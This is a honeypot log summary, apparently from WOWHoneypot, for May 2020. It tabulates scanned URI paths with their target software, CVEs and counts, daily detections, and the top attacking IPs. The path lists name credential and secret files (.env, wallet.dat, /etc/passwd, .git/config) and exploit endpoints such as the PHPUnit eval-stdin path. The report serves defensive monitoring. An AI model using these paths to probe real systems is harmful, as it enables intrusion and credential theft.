WOWHoneypot(Total)

URI PATH

URI Path Target CVE Count
/manager/html Apache Tomcat Manager - 1606 件
/ - - 1069 件
/admin/assets/js/views/login[.]js FreePBX - 270 件
/wp/wp-login[.]php WordPress - 152 件
/wordpress/wp-login[.]php WordPress - 133 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 122 件
/wp-login[.]php WordPress - 114 件
/cgi-bin/mainfunction[.]cgi CGI - 79 件
/index[.]php - - 46 件
/solr/admin/info/system - - 40 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 39 件
/api/jsonws/invoke api - 38 件
/admin/i18n/readme[.]txt Unknown - 26 件
/asterisk/admin/i18n/readme[.]txt Administrator - 26 件
/freepbx/admin/i18n/readme[.]txt Administrator - 26 件
/pbx/recordings/theme/main[.]css FREEPBX - 26 件
/admin/config[.]php PHP - 26 件
/SIPml-api[.]js - - 26 件
/cgi CGI - 26 件
/wordpress/xmlrpc[.]php WordPress - 22 件
/portal/redlion Unknown Unknown 21 件
/hudson Unknown - 21 件
/TP/public/index[.]php - - 21 件
/wp/xmlrpc[.]php WordPress - 20 件
/robots[.]txt robots.txt - 16 件
/boaform/admin/formPing Administrator - 13 件
/favicon[.]ico favicon - 13 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 12 件
/console - - 11 件
/cgi-bin/test-cgi CGI - 10 件
/setup[.]cgi - - 10 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 9 件
/horde/imp/test[.]php Horde Imp - 9 件
/login[.]action Login Page - 9 件
/login Login Page - 9 件
/login/do_login Login Page - 9 件
/public/index[.]php - - 8 件
/jsrpc[.]php JavaScript - 8 件
/zabbix/jsrpc[.]php Zabbix - 8 件
/0bef Unknown - 7 件
/phpmyadmin/ phpMyAdmin - 7 件
/adv,/cgi-bin/weblogin[.]cgi Zyxel NAS CVE-2020-9054 7 件
/operator/basic[.]shtml AXIS 212 PTZ/212PTZ-V - 7 件
/sess-bin/login_session[.]cgi - - 7 件
/GponForm/diag_Form DASAN Network Solutions CVE-2018-10561 6 件
/shell - - 6 件
/doLogin Unknown Unknown 5 件
/xmlrpc[.]php Wordpress - 5 件
/myjsp[.]jsp/ Unknown Unknown 5 件
//phpmyadmin/scripts/setup[.]php phpMyAdmin - 4 件
/phpmyadmin phpMyAdmin - 4 件
/ReportServer SQL Server Reporting Services CVE-2020-0618 4 件
/phpmyadmin/index[.]php - - 4 件
/manager/text/list Apache Tomcat Manager - 4 件
/dvr/cmd LILIN CCTV Camera - 4 件
/ipc$ shared folder - 4 件
/w00tw00t[.]at[.]blackhats[.]romanian[.]
anti-sec:)
 ZmEu - 4 件
/muieblackcat Muieblackcat(scan tool) - 3 件
//phpMyAdmin/scripts/setup[.]php phpMyAdmin - 3 件
//pma/scripts/setup[.]php phpMyAdmin - 3 件
//myadmin/scripts/setup[.]php Administrator - 3 件
//MyAdmin/scripts/setup[.]php Administrator - 3 件
/public/index[.]php/ - - 3 件
/editBlackAndWhiteList DVR/NVR/IPC API - 3 件
hxxp://checkip[.]amazonaws[.]com/ Unauthorized relay - 3 件
checkip[.]amazonaws[.]com:443 Unauthorized Relay - 3 件
/stager32 - - 3 件
/stager64 - - 3 件
/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/blog/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/web/wp-includes/wlwmanifest[.]xml web page - 3 件
/wordpress/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/website/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/wp/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/news/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/2018/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/2019/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/shop/wp-includes/wlwmanifest[.]xml - - 3 件
/wp1/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/test/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/media/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/wp2/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/site/wp-includes/wlwmanifest[.]xml - - 3 件
/cms/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/sito/wp-includes/wlwmanifest[.]xml - - 3 件
/pma/scripts/setup[.]php phpMyAdmin - 3 件
/[.]env Hidden files - 3 件
/clientaccesspolicy[.]xml Silverlight - 2 件
/public/spread[.]php Backdoor -20200626 2 件
/login[.]cgi D-Link Router - 2 件
/sitemap[.]xml - - 2 件
/[.]well-known/security[.]txt Hidden files - 2 件
/tmpfs/auto[.]jpg IP camera - 2 件
/HNAP1/ D-Link Router CVE-2017-3193 2 件
hxxp://163[.]172[.]88[.]110:41298/pass Unauthorized relay - 2 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 2 件
/solr/ - - 2 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p
hp
 - - 2 件
/cgi-bin/nobody/ CGI - 2 件
/cdn-cgi/trace Cloudflare - 2 件
/myadmin/scripts/setup[.]php Administrator - 2 件
/MyAdmin/scripts/setup[.]php Administrator - 2 件
/scripts/setup[.]php - - 2 件
/login[.]html Login Page - 2 件
hxxp://112[.]35[.]66[.]7:8088/index[.]ph
p
 - - 2 件
/php-my-admin/scripts/setup[.]php phpMyAdmin - 2 件
/mysql/scripts/setup[.]php MySQL - 2 件
/mysqladmin/scripts/setup[.]php MySQL - 2 件
hxxp://example[.]com/ Unauthorized relay - 2 件
/admin/connection/ Administrator - 2 件
/myjsp[.]jsp Unknown Unknown 2 件
//hxxpmon[.]php ZABBIX CVE-2013-5743 2 件
/zabbix//hxxpmon[.]php ZABBIX CVE-2013-5743 2 件
//proxies[.]php Zabbix - 2 件
/zabbix//proxies[.]php Zabbix - 2 件
/api_jsonrpc[.]php api - 2 件
/zabbix/api_jsonrpc[.]php Zabbix - 2 件
hxxp://www[.]proxylists[.]net/proxyjudge
[.]php
 Unauthorized relay - 1 件
/s - - 1 件
/webadmin Administrator - 1 件
/home[.]asp ASP file - 1 件
/vpn/index[.]html - - 1 件
/cgi-bin/luci CGI - 1 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 1 件
/remote/login VPN Login - 1 件
/index[.]asp index - 1 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 1 件
/Temporary_Listen_Addresses/SMSSERVICE Microsoft SharePoint CVE-2019-0604 1 件
/wallet[.]dat Bitcoin - 1 件
/bitcoin/wallet[.]dat Bitcoin - 1 件
/backup/wallet[.]dat Bitcoin - 1 件
/Bitcoin/wallet[.]dat Bitcoin - 1 件
/bitcoin/backup/wallet[.]dat Bitcoin - 1 件
/backup/bitcoin/wallet[.]dat Bitcoin - 1 件
/wallet/wallet[.]dat Bitcoin - 1 件
/onvif/device_service VIVOTEK FD8177 devices CVE-2018-14770 1 件
/PSIA/index IP Camera - 1 件
//Admin/scripts/setup[.]php Administrator - 1 件
/file_handler/file[.]php RACCOON STEALER - 1 件
/Autodiscover/Autodiscover[.]xml Outlook - 1 件
/goform/webLogin Unknown Unknown 1 件
/news[.]php - - 1 件
/pmd/index[.]php - - 1 件
/pmd/ index[.]php - - 1 件
/phpmyadmin/ index[.]php - - 1 件
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized relay - 1 件
/spywall/timeConfig[.]php - - 1 件
/tmpfs/snap[.]jpg INSTAR IP Camera - 1 件
/wp-content/plugins/ultimate-elementor/a
ssets/min-js/uael-registration[.]min[.]j
s
 WordPress - 1 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p
hp
 - - 1 件
/lPn3 Unknown 1 件
/user/register Drupal CVE-2018-7600 1 件
/wp-content/plugins/elementor-pro/assets
/css/frontend[.]min[.]css
 WordPress - 1 件
/// - - 1 件
///wp-json/wp/v2/users/ - - 1 件
/stats/ - - 1 件
/wp-json/trx_addons/v2/get/sc_layout WordPress - 1 件
/prov/ Unknown Unknown 1 件
/polycom/ Polycom - 1 件
/prov_l/ Unknown Unknown 1 件
/ata/ Unknown Unknown 1 件
/tftp/ TFTP Server - 1 件
/cisco/ Cisco - 1 件
/phonecnf/ - - 1 件
/snom/ - - 1 件
/linksys/ Linksys - 1 件
/firmware/ Unknown Unknown 1 件
/configs/ - - 1 件
/tftproot/ TFTP Server - 1 件
/tftpboot/ TFTP Server CVE-2008-1611 1 件
/tftpphone/ Unknown Unknown 1 件
/tftpphones/ Unknown Unknown 1 件
/yealink/ yealink - 1 件
/provision/ cfg file- 20200626 1 件
/provisioning/ cfg file- 20200626 1 件
/grandstream/ grandstream - 1 件
/TftpURL/ THTP - 1 件
/config/ - - 1 件
/phone/ - - 1 件
/phones/ - - 1 件
/phone1/ - - 1 件
/phones1/ - - 1 件
/autoprov/ cfg file- 20200626 1 件
/autoprovision/ cfg file - 1 件
/autoprovisioning/ Router - 1 件
/autoprpv/ cfg file - 1 件
/autoprpvision/ cfg file - 1 件
/autoprpvisioning/ cfg file - 1 件
/voipprov/ conf file - 1 件
/cfgprov/ Polycom - 1 件
/sip/ - - 1 件
/xml/ Unknown - 1 件
/backup/ - - 1 件
/cfgs/ Unknown Unknown 1 件
/cfgsip/ cfg file - 1 件
/panasonic/ Panasonic - 1 件
/manage/ - - 1 件
/pro/ - - 1 件
/cfg[.]xml/ Unknown Unknown 1 件
/POLYCOM/ Polycom - 1 件
/path/ - - 1 件
/priv/ Unknown Unknown 1 件
/provisioning[.]cfg/ cfg file- 20200626 1 件
/prv/ Unknown Unknown 1 件
/poly/ Polycom - 1 件
/binconf/ Unknown Unknown 1 件
/poprov/ Unknown Unknown 1 件
/PlcmSpIp/ Polycom - 1 件
/audiocodes/ Unknown Unknown 1 件
/Grandstream/ grandstream - 1 件
/pr1ove/ Unknown Unknown 1 件
/provdf/ Unknown Unknown 1 件
/polycom[.]cfg/ Polycom - 1 件
/digium/ Unknown Unknown 1 件
/avaya/ avaya - 1 件
/Snom/ - - 1 件
/broadsoft/ Unknown Unknown 1 件
/vntransfert/ Unknown Unknown 1 件
/wp-admin/admin-ajax[.]php Administrator - 1 件
hxxp://ip[.]sb/ Unauthorized relay - 1 件
/user/soapCaller[.]bs Drupal - 1 件
/mynameis[.]php Unknown Unknown 1 件
/[.]remote Hidden files - 1 件
/[.]local Hidden files - 1 件
/[.]production Hidden files - 1 件
//vendor/[.]env env file - 1 件
//lib/[.]env env file - 1 件
//lab/[.]env env file - 1 件
//cronlab/[.]env env file - 1 件
//cron/[.]env env file - 1 件
//core/[.]env env file - 1 件
//core/app/[.]env env file - 1 件
//core/Datavase/[.]env env file - 1 件
//database/[.]env Database - 1 件
//config/[.]env env file - 1 件
//assets/[.]env env file - 1 件
//app/[.]env env file - 1 件
//apps/[.]env env file - 1 件
//uploads/[.]env env file - 1 件
//sitemaps/[.]env env file - 1 件
//saas/[.]env env file - 1 件
//api/[.]env env file - 1 件
//psnlink/[.]env env file - 1 件
//exapi/[.]env env file - 1 件
//admin/vendor/phpunit/phpunit/src/Util/
PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//api/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//api2/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//app/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//apps/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//assets/vendor/phpunit/phpunit/src/Util
/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//backup/vendor/phpunit/phpunit/src/Util
/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//blog/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//cms/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//config/vendor/phpunit/phpunit/src/Util
/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//core/Datavase/vendor/phpunit/phpunit/s
rc/Util/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//core/app/vendor/phpunit/phpunit/src/Ut
il/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//core/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//cron/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//cronlab/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//database/vendor/phpunit/phpunit/src/Ut
il/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//demo/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//dev/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//exapi/vendor/phpunit/phpunit/src/Util/
PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//lab/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//laravel/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//lib/phpunit/Util/PHP/eval-stdin[.]php PHPUnit CVE-2017-9841 1 件
//lib/phpunit/phpunit/Util/PHP/eval-stdi
n[.]php
 PHPUnit CVE-2017-9841 1 件
//lib/phpunit/phpunit/src/Util/PHP/eval-
stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//lib/phpunit/src/Util/PHP/eval-stdin[.]
php
 PHPUnit CVE-2017-9841 1 件
//lib/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//new/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//old/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//panel/vendor/phpunit/phpunit/src/Util/
PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//phpunit/Util/PHP/eval-stdin[.]php PHPUnit CVE-2017-9841 1 件
//phpunit/phpunit/Util/PHP/eval-stdin[.]
php
 PHPUnit CVE-2017-9841 1 件
//phpunit/phpunit/src/Util/PHP/eval-stdi
n[.]php
 PHPUnit CVE-2017-9841 1 件
//phpunit/src/Util/PHP/eval-stdin[.]php PHPUnit CVE-2017-9841 1 件
//protected/vendor/phpunit/phpunit/src/U
til/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//psnlink/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//saas/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//sitemaps/vendor/phpunit/phpunit/src/Ut
il/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//sites/all/libraries/mailchimp/vendor/p
hpunit/phpunit/src/Util/PHP/eval-stdin[.
]php
 PHPUnit CVE-2017-9841 1 件
//sites/default/libraries/mailchimp/vend
or/phpunit/phpunit/src/Util/PHP/eval-std
in[.]php
 PHPUnit CVE-2017-9841 1 件
//uploads/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//vendor/phpunit/Util/PHP/eval-stdin[.]p
hp
 PHPUnit CVE-2017-9841 1 件
//vendor/phpunit/phpunit/Util/PHP/eval-s
tdin[.]php
 PHPUnit CVE-2017-9841 1 件
//vendor/phpunit/phpunit/src/Util/PHP/ev
al-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//vendor/phpunit/src/Util/PHP/eval-stdin
[.]php
 PHPUnit CVE-2017-9841 1 件
//vendor/vendor/phpunit/phpunit/src/Util
/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//wp-content/plugins/cloudflare/vendor/p
hpunit/phpunit/src/Util/PHP/eval-stdin[.
]php
 PHPUnit CVE-2017-9841 1 件
//wp-content/plugins/dzs-videogallery/cl
ass_parts/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//wp-content/plugins/jekyll-exporter/ven
dor/phpunit/phpunit/src/Util/PHP/eval-st
din[.]php
 PHPUnit CVE-2017-9841 1 件
//wp-content/plugins/mm-plugin/inc/vendo
rs/vendor/phpunit/phpunit/src/Util/PHP/e
val-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//www/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
/images[.]php - - 1 件
/sftp-config[.]json - - 1 件
/[.]ftpconfig Hidden files - 1 件
/[.]remote-sync[.]json Hidden files - 1 件
/[.]vscode/ftp-sync[.]json Hidden files - 1 件
/[.]vscode/sftp[.]json Hidden files - 1 件
/deployment-config[.]json Atom - 1 件
/ftpsync[.]settings FTPSync - 1 件
/admin/ Administrator - 1 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 1 件
/wp// WordPress - 1 件
/wp//wp-json/wp/v2/users/ WordPress - 1 件
/wordpress// WordPress - 1 件
/wordpress//wp-json/wp/v2/users/ WordPress - 1 件
/a2billing/admin/Public/index[.]php - - 1 件
/card_scan_decoder[.]php Linear eMerge E3-Series CVE-2019-7256 1 件
hxxp://112[.]35[.]53[.]83:8088/index[.]p
hp
 - - 1 件
/var/lib/phpmyadmin/config[.]inc[.]php phpMyAdmin - 1 件
/lib/phpmyadmin/config[.]inc[.]php phpMyAdmin - 1 件
/phpmyadmin/config[.]inc[.]php phpMyAdmin - 1 件
/phpmy/scripts/setup[.]php phpMyAdmin - 1 件
/admindb/scripts/setup[.]php Administrator - 1 件
/admin/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/admin/scripts/setup[.]php Administrator - 1 件
/dbadmin/scripts/setup[.]php Administrator - 1 件
/db/scripts/setup[.]php Database - 1 件
/phpmyadmin2/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin/scripts/setup0[.]php phpMyAdmin - 1 件
/phpmyadmin/scripts/setup1[.]php phpMyAdmin - 1 件
/_phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin_/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin/scripts/_setup[.]php phpMyAdmin - 1 件
/phpMyAdmin/scripts[.]setup[.]php phpMyAdmin - 1 件
/sql/scripts/setup[.]php - - 1 件
/web/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 1 件
/configuracion/phpmyadmin/scripts/setup[
.]php
 - - 1 件
/websql/scripts/setup[.]php SQL - 1 件
/sqladmin/scripts/setup[.]php - - 1 件
/php/scripts/setup[.]php php - 1 件
/php/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin/scripts/setup[.]php/index[.]
php
 - - 1 件
/phpMyAdmin-2[.]8[.]0[.]4/scripts/setup[
.]php
 phpMyAdmin - 1 件
/phpmy-admin/scripts/setup[.]php phpMyAdmin - 1 件
/php-admin/scripts/setup[.]php Administrator - 1 件
/phpMyAdmin-2[.]8[.]2/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]8[.]1/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]8[.]0/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/wp-content/plugins/wp-phpmyadmin/wp-php
myadmin/phpmyadmin/scripts/setup[.]php
 phpMyAdmin - 1 件
/wp-phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/wp-phpmyadmin/phpmyadmin/scripts/setup[
.]php
 phpMyAdmin - 1 件
/wordpress/wp-content/plugins/wp-phpmyad
min/phpmyadmin/scripts/setup[.]php
 phpMyAdmin - 1 件
/wp/wp-content/plugins/wp-phpmyadmin/php
myadmin/scripts/setup[.]php
 phpMyAdmin - 1 件
/webapps/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin[.]box25/scripts/setup[.]php phpMyAdmin - 1 件
/admincooptel/phpMyAdmin/scripts/setup[.
]php
 phpMyAdmin - 1 件
/pyaniste/mysqladmin/scripts/setup[.]php MySQL - 1 件
/alt/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/phpMyAdmin-2[.]6[.]3/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]6[.]4/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]7[.]0/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]5[.]6/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]5[.]7/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/etc/passwd passwd file - 1 件
/dnscfg[.]cgi D-Link DSL - 1 件
//runtime/log/202005/22[.]log Unknown Unknown 1 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 1 件
www[.]baidu[.]com:443 Unauthorized relay - 1 件
hxxp://www[.]123cha[.]com/ Unauthorized relay - 1 件
hxxp://www[.]rfa[.]org/english/ Unauthorized relay - 1 件
www[.]ipip[.]net:443 Unauthorized relay - 1 件
cn[.]bing[.]com:443 Unauthorized relay - 1 件
/[.]git/config Hidden files - 1 件
/vod_installer/[.]env env file - 1 件
/login/[.]env Login Page - 1 件
/fedex/[.]env env file - 1 件
/apps/[.]env env file - 1 件
/docker/[.]env env file - 1 件
/engine/[.]env env file - 1 件
/app/[.]env env file - 1 件
/sources/[.]env - - 1 件
/inc/[.]env env file - 1 件
/development/[.]env env file - 1 件
/system/[.]env - - 1 件
/admin/[.]env Administrator - 1 件
/deployment/[.]env env file - 1 件
/a/[.]env env file - 1 件
/react/[.]env env file - 1 件
/travis/[.]env env file - 1 件
/public/[.]env env file - 1 件
/backend/[.]env env file - 1 件
/protected/[.]env env file - 1 件
/dependencies/[.]env env file - 1 件
/vue/[.]env env file - 1 件
/laravel/[.]env env file - 1 件
/auth/[.]env env file - 1 件
/scripts/[.]env - - 1 件
/personal/[.]env env file - 1 件
/cp/[.]env env file - 1 件
/framework/[.]env env file - 1 件
/shared/[.]env - - 1 件
/m/[.]env env file - 1 件
/server/[.]env - - 1 件
/local/[.]env env file - 1 件
/admin-app/[.]env Administrator - 1 件
/web/[.]env web page - 1 件
/search/[.]env - - 1 件
/cron/[.]env env file - 1 件
/document/[.]env env file - 1 件
/src/[.]env - - 1 件
/master/[.]env env file - 1 件
/application/[.]env env file - 1 件
/frontend/[.]env env file - 1 件
/ironment/[.]env env file - 1 件
/project/[.]env env file - 1 件
/rest/[.]env env file - 1 件
/mods/[.]env env file - 1 件
/routes/[.]env env file - 1 件
/~dev/[.]env env file - 1 件
/private/[.]env env file - 1 件
/dev/[.]env env file - 1 件
/site/[.]env - - 1 件
/back/[.]env env file - 1 件
/api/[.]env api - 1 件
/laravel-artisan/[.]env env file - 1 件
/config/[.]env - - 1 件
/cli/[.]env env file - 1 件
/core/[.]env env file - 1 件
github[.]com:443 Unauthorized Relay - 1 件
/vicidial/admin[.]php Administrator - 1 件

WOWHoneypot(HTTPS)(Total)

Number of detections

Date Detections
20200501 40
20200502 24
20200503 53
20200504 14
20200505 34
20200506 8379
20200507 46
20200508 34
20200509 17
20200510 67
20200511 84
20200512 70
20200513 59
20200514 80
20200515 29
20200516 22
20200517 24
20200518 20
20200519 34
20200520 34
20200521 24
20200522 20
20200523 26
20200524 21
20200525 16
20200526 22
20200527 23
20200528 24
20200529 24
20200530 16
20200531 28

RemoteIP(TOP20)

IP Country Count AbuseIPDB
185[.]128[.]41[.]50 Switzerland 1542 件 Link
77[.]247[.]108[.]119 Estonia 244 件 Link
77[.]247[.]108[.]77 Estonia 209 件 Link
195[.]54[.]160[.]121 Russia 100 件 Link
118[.]27[.]18[.]141 Japan 74 件 Link
185[.]234[.]218[.]174 Poland 65 件 Link
104[.]210[.]54[.]108 United States 61 件 Link
195[.]54[.]160[.]123 Russia 54 件 Link
95[.]110[.]201[.]243 Italy 54 件 Link
5[.]101[.]0[.]209 Russia 49 件 Link
51[.]15[.]159[.]90 France 46 件 Link
62[.]210[.]79[.]219 France 44 件 Link
54[.]94[.]160[.]7 Brazil 40 件 Link
195[.]54[.]160[.]130 Russia 35 件 Link
134[.]255[.]234[.]161 Germany 34 件 Link
123[.]56[.]120[.]251 China 28 件 Link
83[.]34[.]162[.]179 Spain 24 件 Link
62[.]210[.]84[.]69 France 23 件 Link
80[.]82[.]78[.]104 Netherlands 21 件 Link
58[.]8[.]156[.]171 Thailand 19 件 Link

URI PATH

URI Path Target CVE Count
/manager/html Apache Tomcat Manager - 1606 件
/ - - 1069 件
/admin/assets/js/views/login[.]js FreePBX - 270 件
/wp/wp-login[.]php WordPress - 152 件
/wordpress/wp-login[.]php WordPress - 133 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 122 件
/wp-login[.]php WordPress - 114 件
/cgi-bin/mainfunction[.]cgi CGI - 79 件
/index[.]php - - 46 件
/solr/admin/info/system - - 40 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 39 件
/api/jsonws/invoke api - 38 件
/admin/i18n/readme[.]txt Unknown - 26 件
/asterisk/admin/i18n/readme[.]txt Administrator - 26 件
/freepbx/admin/i18n/readme[.]txt Administrator - 26 件
/pbx/recordings/theme/main[.]css FREEPBX - 26 件
/admin/config[.]php PHP - 26 件
/SIPml-api[.]js - - 26 件
/cgi CGI - 26 件
/wordpress/xmlrpc[.]php WordPress - 22 件
/portal/redlion Unknown Unknown 21 件
/hudson Unknown - 21 件
/TP/public/index[.]php - - 21 件
/wp/xmlrpc[.]php WordPress - 20 件
/robots[.]txt robots.txt - 16 件
/boaform/admin/formPing Administrator - 13 件
/favicon[.]ico favicon - 13 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 12 件
/console - - 11 件
/cgi-bin/test-cgi CGI - 10 件
/setup[.]cgi - - 10 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 9 件
/horde/imp/test[.]php Horde Imp - 9 件
/login[.]action Login Page - 9 件
/login Login Page - 9 件
/login/do_login Login Page - 9 件
/public/index[.]php - - 8 件
/jsrpc[.]php JavaScript - 8 件
/zabbix/jsrpc[.]php Zabbix - 8 件
/0bef Unknown - 7 件
/phpmyadmin/ phpMyAdmin - 7 件
/adv,/cgi-bin/weblogin[.]cgi Zyxel NAS CVE-2020-9054 7 件
/operator/basic[.]shtml AXIS 212 PTZ/212PTZ-V - 7 件
/sess-bin/login_session[.]cgi - - 7 件
/GponForm/diag_Form DASAN Network Solutions CVE-2018-10561 6 件
/shell - - 6 件
/doLogin Unknown Unknown 5 件
/xmlrpc[.]php Wordpress - 5 件
/myjsp[.]jsp/ Unknown Unknown 5 件
//phpmyadmin/scripts/setup[.]php phpMyAdmin - 4 件
/phpmyadmin phpMyAdmin - 4 件
/ReportServer SQL Server Reporting Services CVE-2020-0618 4 件
/phpmyadmin/index[.]php - - 4 件
/manager/text/list Apache Tomcat Manager - 4 件
/dvr/cmd LILIN CCTV Camera - 4 件
/ipc$ shared folder - 4 件
/w00tw00t[.]at[.]blackhats[.]romanian[.]
anti-sec:)
 ZmEu - 4 件
/muieblackcat Muieblackcat(scan tool) - 3 件
//phpMyAdmin/scripts/setup[.]php phpMyAdmin - 3 件
//pma/scripts/setup[.]php phpMyAdmin - 3 件
//myadmin/scripts/setup[.]php Administrator - 3 件
//MyAdmin/scripts/setup[.]php Administrator - 3 件
/public/index[.]php/ - - 3 件
/editBlackAndWhiteList DVR/NVR/IPC API - 3 件
hxxp://checkip[.]amazonaws[.]com/ Unauthorized relay - 3 件
checkip[.]amazonaws[.]com:443 Unauthorized Relay - 3 件
/stager32 - - 3 件
/stager64 - - 3 件
/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/blog/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/web/wp-includes/wlwmanifest[.]xml web page - 3 件
/wordpress/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/website/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/wp/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/news/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/2018/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/2019/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/shop/wp-includes/wlwmanifest[.]xml - - 3 件
/wp1/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/test/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/media/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/wp2/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/site/wp-includes/wlwmanifest[.]xml - - 3 件
/cms/wp-includes/wlwmanifest[.]xml WordPress - 3 件
/sito/wp-includes/wlwmanifest[.]xml - - 3 件
/pma/scripts/setup[.]php phpMyAdmin - 3 件
/[.]env Hidden files - 3 件
/clientaccesspolicy[.]xml Silverlight - 2 件
/public/spread[.]php Backdoor -20200626 2 件
/login[.]cgi D-Link Router - 2 件
/sitemap[.]xml - - 2 件
/[.]well-known/security[.]txt Hidden files - 2 件
/tmpfs/auto[.]jpg IP camera - 2 件
